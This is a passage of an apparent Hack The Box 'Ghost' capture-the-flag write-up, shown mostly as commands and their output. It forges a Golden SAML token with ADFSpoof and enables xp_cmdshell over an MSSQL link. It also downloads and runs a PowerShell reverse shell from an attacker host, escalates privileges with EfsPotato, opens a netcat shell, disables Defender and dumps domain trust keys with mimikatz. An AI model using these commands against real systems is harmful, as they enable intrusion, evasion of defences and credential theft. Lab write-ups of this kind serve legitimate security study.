└─$ >....                                                                                        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' >token-signing-key.txt         
┌──(kali㉿kali)-[~/Hackthebox/GHost]
└─$ cat token-signing-key.txt| base64 -d > TSK.bin 
                                                                                                 
┌──(kali㉿kali)-[~/Hackthebox/GHost]
└─$ cat private.txt| tr -d "-" | xxd -r -p > private.bin 

Now we can forge our Golden SAML token using ADFSpoof tool:

┌──(kali㉿kali)-[~/Hackthebox/GHost/ADFSpoof]
└─$ python3 ADFSpoof.py -b TSK.bin private.bin -s 'core.ghost.htb' saml2 --endpoint 'https://core.ghost.htb:8443/adfs/saml/postResponse' --nameidformat 'urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress' --nameid 'Administrator@ghost.htb' --rpidentifier 'https://core.ghost.htb:8443' --assertions '<Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/upn"><AttributeValue>Administrator@ghost.htb</AttributeValue></Attribute><Attribute Name="http://schemas.xmlsoap.org/claims/CommonName"><AttributeValue>Administrator</AttributeValue></Attribute>'
    ___    ____  ___________                   ____
   /   |  / __ \/ ____/ ___/____  ____  ____  / __/
  / /| | / / / / /_   \__ \/ __ \/ __ \/ __ \/ /_  
 / ___ |/ /_/ / __/  ___/ / /_/ / /_/ / /_/ / __/  
/_/  |_/_____/_/    /____/ .___/\____/\____/_/     
                        /_/                        

A tool to for AD FS security tokens
Created by @doughsec

/home/kali/Hackthebox/GHost/ADFSpoof/ADFSpoof.py:96: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.utcnow()
PHNhbWxwOlJlc3BvbnNlIHhtbG5zOnNhbWxwPSJ1cm46b2FzaXM6bmFtZXM6dGM6U0FNTDoyLjA6cHJvdG9jb2wiIElEPSJfWFlISkhFIiBWZXJzaW9uPSIyLjAiIElzc3VlSW5zdGFudD0iMjAyNS0wNC0wNFQwOTowNDo1OC4wMDBaIiBEZXN0aW5hdGlvbj0iaHR0cHM6Ly9jb3JlLmdob3N0Lmh0Yjo4NDQzL2FkZnMvc2FtbC9wb3N0UmVzcG9uc2UiIENvbnNlbnQ9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDpjb25zZW50OnVuc3BlY2lmaWVkIj48SXNzdWVyIHhtbG5zPSJ1cm46b2FzaXM6bmFtZXM6dGM6U0FNTDoyLjA6YXNzZXJ0aW9uIj5odHRwOi8vY29yZS5naG9zdC5odGIvYWRmcy9zZXJ2aWNlcy90cnVzdDwvSXNzdWVyPjxzYW1scDpTdGF0dXM%2BPHNhbWxwOlN0YXR1c0NvZGUgVmFsdWU9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDpzdGF0dXM6U3VjY2VzcyIvPjwvc2FtbHA6U3RhdHVzPjxBc3NlcnRpb24geG1sbnM9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDphc3NlcnRpb24iIElEPSJfSkZPSzlUIiBJc3N1ZUluc3RhbnQ9IjIwMjUtMDQtMDRUMDk6MDQ6NTguMDAwWiIgVmVyc2lvbj0iMi4wIj48SXNzdWVyPmh0dHA6Ly9jb3JlLmdob3N0Lmh0Yi9hZGZzL3NlcnZpY2VzL3RydXN0PC9Jc3N1ZXI%2BPGRzOlNpZ25hdHVyZSB4bWxuczpkcz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC8wOS94bWxkc2lnIyI%2BPGRzOlNpZ25lZEluZm8%2BPGRzOkNhbm9uaWNhbGl6YXRpb25NZXRob2QgQWxnb3JpdGhtPSJodHRwOi8vd3d3LnczLm9yZy8yMDAxLzEwL3htbC1leGMtYzE0biMiLz48ZHM6U2lnbmF0dXJlTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8wNC94bWxkc2lnLW1vcmUjcnNhLXNoYTI1NiIvPjxkczpSZWZlcmVuY2UgVVJJPSIjX0pGT0s5VCI%2BPGRzOlRyYW5zZm9ybXM%2BPGRzOlRyYW5zZm9ybSBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyNlbnZlbG9wZWQtc2lnbmF0dXJlIi8%2BPGRzOlRyYW5zZm9ybSBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvMTAveG1sLWV4Yy1jMTRuIyIvPjwvZHM6VHJhbnNmb3Jtcz48ZHM6RGlnZXN0TWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8wNC94bWxlbmMjc2hhMjU2Ii8%2BPGRzOkRpZ2VzdFZhbHVlPml5L1ozSUt3QVpMMi9zRjFPWk9xVTNkSTRSOWdKNTZFNjdjaFI3eXRhQ009PC9kczpEaWdlc3RWYWx1ZT48L2RzOlJlZmVyZW5jZT48L2RzOlNpZ25lZEluZm8%2BPGRzOlNpZ25hdHVyZVZhbHVlPlllOHlacFEzVkNvQVlSVUs5cW15akZOMzlYYkVLSUdURWFEVGZOcDQ2ckd4UndmbXRjVytlc1NnaHNKT3p4cmJKd2I2bjdjZG1zbFNObkNrZWpRS3FTTktKOU9ZYzdLQmhPcWpOcGhSYUt2akh3czZZYWVYTUxHVWEvUlo0V3ZQWVAwMnZDdUhOUmpwZnRIQituY21KV1B1UVBza3NYWUdRQjVoak5MNCtONWlNSlhxODhpaG5DT0FydHdpdFZNZ2VvNE5vbnpVOUhhS0ZxYmphajN3SjlkeHhKWTBzR3hIYVhhRGszM0JVRzlUc0JybWdEZ1FIZ21YOGlpUUdtNWpiM3J3bDhnbFZUMCtNZnNSL0JlakJsWkhsN00yQkRwUjlxd3VqMmJWbkRLQmFUaDl0SHBBTHlINGRjZHJ2SjFpSkMyVWphV3V4UmtQMktoYzhCRDRJNXV2RUxFVDlRUno2dEgxcnNySXJpSW9nMEE1aCtDSG9rSUw5VEU0YUhIeUMrUnEyNkRBejZTYWxpVzV1aW1hSzQzMDhsODFPenB3YUlJSW5DMU1xeHAyLzM4UWE5YUFmSzhuRTY1V21UYXNSRFc3MGVyMTA4Lzd0QTY0MTFTdHBmVmhhZTJpTkZpZGxrT1g1ZWVEcy9vLzhWc0dIZHRZUEVpOTZucE9ZaFAzVmxBU1oxeDkvbEQxVXA2cTUxYVBET2pYc1grVDhQd1ozOE5YcS9tNkkyRmpqYU1CMFowYnIvNUtwVTI3MDdtT0thMEdyVmduYlBnUlMyemQ5Z1JIUWVTZkJha1FpOXJrT0w2dndZVUdIOThYNjdjc1pUTjNsU3I0YWlvZ0tmUFIzRTgyOFh4K1Qrcmw5SVE4dVhkeElocElEYktlWXgvUHdpRUVsVG1BUitZPTwvZHM6U2lnbmF0dXJlVmFsdWU%2BPGRzOktleUluZm8%2BPGRzOlg1MDlEYXRhPjxkczpYNTA5Q2VydGlmaWNhdGU%2BTUlJRTVqQ0NBczZnQXdJQkFnSVFKRmNXd015YlJhNU80K1dPNXRXb0dUQU5CZ2txaGtpRzl3MEJBUXNGQURBdU1Td3dLZ1lEVlFRREV5TkJSRVpUSUZOcFoyNXBibWNnTFNCbVpXUmxjbUYwYVc5dUxtZG9iM04wTG1oMFlqQWdGdzB5TkRBMk1UZ3hOakUzTVRCYUdBOHlNVEEwTURVek1ERTJNVGN4TUZvd0xqRXNNQ29HQTFVRUF4TWpRVVJHVXlCVGFXZHVhVzVuSUMwZ1ptVmtaWEpoZEdsdmJpNW5hRzl6ZEM1b2RHSXdnZ0lpTUEwR0NTcUdTSWIzRFFFQkFRVUFBNElDRHdBd2dnSUtBb0lDQVFDK0FBT0lmRXF0bFljbjE1M0wxQnZHUWdEeVhUbll3VFJ6c0s1OSt6RTF6Z0dLTzlONW5iOEZrK2RhS3BXTFFhaUg3b0RIYWVudy9RYXhCZzVxZGVEWW1EM296OEt5YUExeWdZQnJ6bTR3VzdGZjg3cks5RmU1SjUvaDZXOWc3NDloNUJJcVBRT3AwbDZzMXJmdW1PY2NONHliVzk1RVdOTDB2dVFYdkMrS1E0RDRnTVh1OG1DR3B4dHZJTDhpbE50SnVJRzNPUllTS2hSYWwweXlKZU9oRzR4Z2xyWkpGMThwOXdobkU2b21nZ21BNm4yc2hEay90dlRZamlpNWU3L2ljV1RLa3JzTUNwYUtVTms3bXhkTVpoUWFiN1NtZktyWk40cFJEN2RWZzV6ekl5RDdVelM5Q0hMQzZ4TnpxL1owaHVhT2FKaE9TZEpTZ2F0L2JzRzhuYngxOUhELyt5cFc5SjJMdE5GdWdkV3RtVUJXRE9RQllWaEI4U2c0VkVHZ1A5anlJdEhIMmJ6c0RmalJkSjhFMXVOSldQL2tRQTErd1lsT2RkTHFVM2IwSXNDdmxBOEV2WVcwVDFSc3U3N280eC93MGdXYjBvUVBFSXo3ejk3M2I0OTZ3cVF0M0RueWZlTzNsWFhmWk5jdmFqNUtDUDJUdEdCK0tzaEY5cGtJUHhxN0YyZ01oN1FqeGpSSHNBMjlWOGpGbzlnTEQ3a1BWaWNhSVVkc2dpRkhuWVFGMTRhNTJKdFIxVjVpTitoOTVKa3V1RXFRV0RCSEF2UEVCQlprRVpIKzV5VCthQ0ZYWFgrQnBQdDNRR2pZTGVKVThDRnNNdG44UVZMWXZMZGNWUnNVblJoL1dIaVh3Sk9PRVZFQ2E5dzcveVZuaGFsQ05CeDFFL2w0S1FJREFRQUJNQTBHQ1NxR1NJYjNEUUVCQ3dVQUE0SUNBUUFXWUtaVzNjRENCTzZkVDN5ZmwzT2N1eXAxTFZLVkkrOXBGeC9iYldwV2pTZGg2YjM5TFR4eEQ3RllVdGh1V1BaM3JGNEcrRmRNRkhIQ3gzWXBFbVVGbkVMS3NYcWhaOTg5QVg1OEkvM21iZlVsS1dlSVBMU0xrcCtlUlpvTUprdDdrMS9LWHREYXNPUW4wTnNnWUVvd0xCSW1NQ011OXV1am5DbUZPd0hQL0lCaGdZUU1IaDQ2QnpTWFdQM2k4VlhiclJ0RHBvL2MvL09GSmhHbW5uRjhaUG1pNHh0emZTREJwVktxd1ZMcDc4Q2d1TXhqUWQrYmRVYjQ1NTg4Wko0Q0xzUGRSUXAzMFdKMS9DTklhZW52Sld0QTJHNUladzVVMEVXQ0pMb1lKV0ZzOWl5T2ExL3k1NXJ1VzZKOGxJR0Qwd21vRWVDbDlDSDFFZDRkelVkVVhmMU1CQ1lQM1g5MmlheHpVRTB1cEdkLzFRbzZIVHl5T2xXdUF3cmtUMlZIRUxLVlpLT2c4K2RseTk3Z3laSWZVdFF3SWtQd05sOHZvMDRjZmoraHpPdkJ6UEtBQVloMTROTGd2ZUFJL0RxTW5PME9LTyt3MUhCS3c2NE5CQ244Z29hekYrUHVGZlVPMHlOSEZMNGt4TXBjYXA2aWV2NmczQlhDU0R3ZnFUVU9FdUVzN3E5b1lLZ3EycW5OVk9USWhoSW5NWEJ6RW02aVAxM2pmdU9vWEpkUEFuRVVYbjR5NXl3QTk3cnRiR25aRVB5eDFmMUVrWC9oYnFCUDR2b2d2OWtsdGFVRUVWWGtTK2hQcHhabWV4Q05yQkQxcTdHSi81MGViWWxDMENldjh3Nk1zOHRNME9ydnBwR1lsV3J0UHdldkV2ZmlSa3dCTEc3RU1BbkxTdz09PC9kczpYNTA5Q2VydGlmaWNhdGU%2BPC9kczpYNTA5RGF0YT48L2RzOktleUluZm8%2BPC9kczpTaWduYXR1cmU%2BPFN1YmplY3Q%2BPE5hbWVJRCBGb3JtYXQ9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjEuMTpuYW1laWQtZm9ybWF0OmVtYWlsQWRkcmVzcyI%2BQWRtaW5pc3RyYXRvckBnaG9zdC5odGI8L05hbWVJRD48U3ViamVjdENvbmZpcm1hdGlvbiBNZXRob2Q9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDpjbTpiZWFyZXIiPjxTdWJqZWN0Q29uZmlybWF0aW9uRGF0YSBOb3RPbk9yQWZ0ZXI9IjIwMjUtMDQtMDRUMDk6MDk6NTguMDAwWiIgUmVjaXBpZW50PSJodHRwczovL2NvcmUuZ2hvc3QuaHRiOjg0NDMvYWRmcy9zYW1sL3Bvc3RSZXNwb25zZSIvPjwvU3ViamVjdENvbmZpcm1hdGlvbj48L1N1YmplY3Q%2BPENvbmRpdGlvbnMgTm90QmVmb3JlPSIyMDI1LTA0LTA0VDA5OjA0OjU4LjAwMFoiIE5vdE9uT3JBZnRlcj0iMjAyNS0wNC0wNFQxMDowNDo1OC4wMDBaIj48QXVkaWVuY2VSZXN0cmljdGlvbj48QXVkaWVuY2U%2BaHR0cHM6Ly9jb3JlLmdob3N0Lmh0Yjo4NDQzPC9BdWRpZW5jZT48L0F1ZGllbmNlUmVzdHJpY3Rpb24%2BPC9Db25kaXRpb25zPjxBdHRyaWJ1dGVTdGF0ZW1lbnQ%2BPEF0dHJpYnV0ZSBOYW1lPSJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy91cG4iPjxBdHRyaWJ1dGVWYWx1ZT5BZG1pbmlzdHJhdG9yQGdob3N0Lmh0YjwvQXR0cmlidXRlVmFsdWU%2BPC9BdHRyaWJ1dGU%2BPEF0dHJpYnV0ZSBOYW1lPSJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy9jbGFpbXMvQ29tbW9uTmFtZSI%2BPEF0dHJpYnV0ZVZhbHVlPkFkbWluaXN0cmF0b3I8L0F0dHJpYnV0ZVZhbHVlPjwvQXR0cmlidXRlPjwvQXR0cmlidXRlU3RhdGVtZW50PjxBdXRoblN0YXRlbWVudCBBdXRobkluc3RhbnQ9IjIwMjUtMDQtMDRUMDk6MDQ6NTcuNTAwWiIgU2Vzc2lvbkluZGV4PSJfSkZPSzlUIj48QXV0aG5Db250ZXh0PjxBdXRobkNvbnRleHRDbGFzc1JlZj51cm46b2FzaXM6bmFtZXM6dGM6U0FNTDoyLjA6YWM6Y2xhc3NlczpQYXNzd29yZFByb3RlY3RlZFRyYW5zcG9ydDwvQXV0aG5Db250ZXh0Q2xhc3NSZWY%2BPC9BdXRobkNvbnRleHQ%2BPC9BdXRoblN0YXRlbWVudD48L0Fzc2VydGlvbj48L3NhbWxwOlJlc3BvbnNlPg%3D%3D

NOTE: I ran into a LOT of issues when trying to run ADFSpoof because of packages and dependancies issues especially because of lxml, signxml and cryptography libraries. I referred to this stackoverflow discussion for help.

And now we can spoof authentication mechanisms of the http://core.ghost.htb:8443/ subdomain previously discovered on our initial recon using our golden SAML:

ADFS

Now we will add the application/x-www-form-urlencoded Content-Type header alongside our SAMLRESPONSE header and we’ll get the link to our federation so we could login:

ADFS

And now we have a valid login using our crafted Golden SAML token. All we have to do now is right click on burpsuite Request in browser => In original session and we’ll be logged in:

ADFS

MSSQL Command injection

We can see that we can execute SQL queries:

MSSQL

So I instantly went ahead to test the usual MSSQL command injection by trying to enable xp_cmdshell (I spoke about this in a previous writeup):

EXECUTE('EXECUTE AS LOGIN = ''sa'' EXEC SP_CONFIGURE ''show advanced options'', 1;reconfigure;EXEC SP_CONFIGURE ''xp_cmdshell'' , 1;reconfigure;exec xp_cmdshell ''whoami''') AT "PRIMARY"

MSSQL

So I tried to get a reverse shell using the Invoke-PowershellTCP.ps1 reverse shell script:

EXECUTE('EXECUTE AS LOGIN = ''sa'' EXEC SP_CONFIGURE ''show advanced options'', 1;reconfigure;EXEC SP_CONFIGURE ''xp_cmdshell'' , 1;reconfigure;exec xp_cmdshell ''powershell -c iex (iwr 10.10.16.25/shell.ps1 -usebasicparsing)''') AT "PRIMARY"

And we’re in:

┌──(kali㉿kali)-[~/Hackthebox/GHost]
└─$ nc -lnvp 9001            
listening on [any] 9001 ...
connect to [10.10.16.25] from (UNKNOWN) [10.129.231.105] 49844
Windows PowerShell running as user MSSQLSERVER on PRIMARY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>whoami
nt service\mssqlserver

Checking our privileges we can see we have SeImpersonatePrivilege enabled, which allows a process to impersonate another user or process:

PS C:\Windows\system32> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
PS C:\Windows\system32> 

We can abuse that using EfsPotato . We can quickly compile it on the target system using this command:

C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe EfsPotato.cs -nowarn:1691,618

Now run it:

PS C:\temp> ./efs.exe 'whoami'
Exploit for EfsPotato(MS-EFSR EfsRpcEncryptFileSrv with SeImpersonatePrivilege local privalege escalation vulnerability).
Part of GMH's fuck Tools, Code By zcgonvh.
CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes support by Pablo Martinez (@xassiz) [www.blackarrow.net]

[+] Current user: NT Service\MSSQLSERVER
[+] Pipe: \pipe\lsarpc
[!] binding ok (handle=1a339b90)
[+] Get Token: 888
[!] process with pid: 3408 created.
==============================
nt authority\system

Now simply let’s get a reverse shell as nt authority\system using netcat:

PS C:\temp> iwr 10.10.16.25/nc64.exe -outfile nc64.exe
PS C:\temp> ./efs.exe 'c:/temp/nc64.exe 10.10.16.25 9001 -e powershell.exe'

And we’re in:

┌──(kali㉿kali)-[~/Hackthebox/GHost]
└─$ rlwrap nc -lvnp 9001  
listening on [any] 9001 ...
connect to [10.10.16.25] from (UNKNOWN) [10.129.231.105] 49799
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp> whoami
whoami
nt authority\system

Domain Trust Abuse

However, going into the administrator desktop we don’t find a flag:

PS C:\users\administrator\desktop> ls
ls
PS C:\users\administrator\desktop>

Which suggests that this is still not over. We can recall that earlier when checking BloodHound, we saw that there was a trust relationship between ghost.htb and corp.ghost.htb:

Trust

Now since we are admins of the DC of ghost.htb, we can dump the domain trust keys and abuse that.
Let’s first disable AV:

PS C:\users\administrator\desktop> Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableRealtimeMonitoring $true
PS C:\users\administrator\desktop> 

Now let’s bring mimikatz over and dump trust:

PS C:\users\administrator\desktop> ./mimi.exe "lsadump::trust /patch" exit
./mimi.exe "lsadump::trust /patch" exit

  .#####.   mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # lsadump::trust /patch

Current domain: CORP.GHOST.HTB (GHOST-CORP / S-1-5-21-2034262909-2733679486-179904498)

Domain: GHOST.HTB (GHOST / S-1-5-21-4084500788-938703357-3654145966)
 [  In ] CORP.GHOST.HTB -> GHOST.HTB
    * 4/3/2025 7:35:00 AM - CLEAR   - f5 b6 25 22 56 6c 5e e4 49 b8 28 10 1f e5 2f 26 08 11 a6 11 32 48 81 5a 5e d7 df 5c 40 be 65 85 b9 e2 ee 33 44 15 96 07 8f c7 dc 32 39 88 77 be 56 d4 1a c8 9e c5 9c bb e8 31 31 77 b2 e2 e8 35 f2 57 a0 f5 44 65 fe c4 af f2 4b 60 b3 cf db 3c 85 bc 7e 6e a8 d8 63 af d3 a8 1c b2 dd 49 39 37 04 dd e7 67 0d 56 89 4c 47 aa 83 2b 85 e8 7a d2 48 c0 19 65 df 89 f5 70 4c d0 97 06 67 c0 f1 31 00 21 f7 63 e3 31 f1 9c 46 fe d7 2f ff b8 8e cf 61 3e c5 26 e6 db 69 3d 26 4c a2 6b 75 ba 6c c9 52 bd 7c 30 03 cf 70 59 18 25 b8 4c 3e c7 2b ae 0c 53 b7 a1 70 a1 d6 e1 91 7e 51 60 d4 c2 00 40 23 c4 71 10 4d e0 f9 0d a5 27 b4 46 ee 01 48 cf d8 8c e4 bf 1d 7a 0d 86 28 9f bf 1e 11 c5 30 26 9b 34 61 5e b5 64 db be db 8d f0 6f d8 84 90 94 
        * aes256_hmac       1c8efba1ea334462d247e0513a99525eb2844820b3134679ad79f99b989f9954
        * aes128_hmac       b0130dc0a4eff3cf59e7b3cd105cad67
        * rc4_hmac_nt       61f02da833df265bbc885f02b950daa2

 [ Out ] GHOST.HTB -> CORP.GHOST.HTB
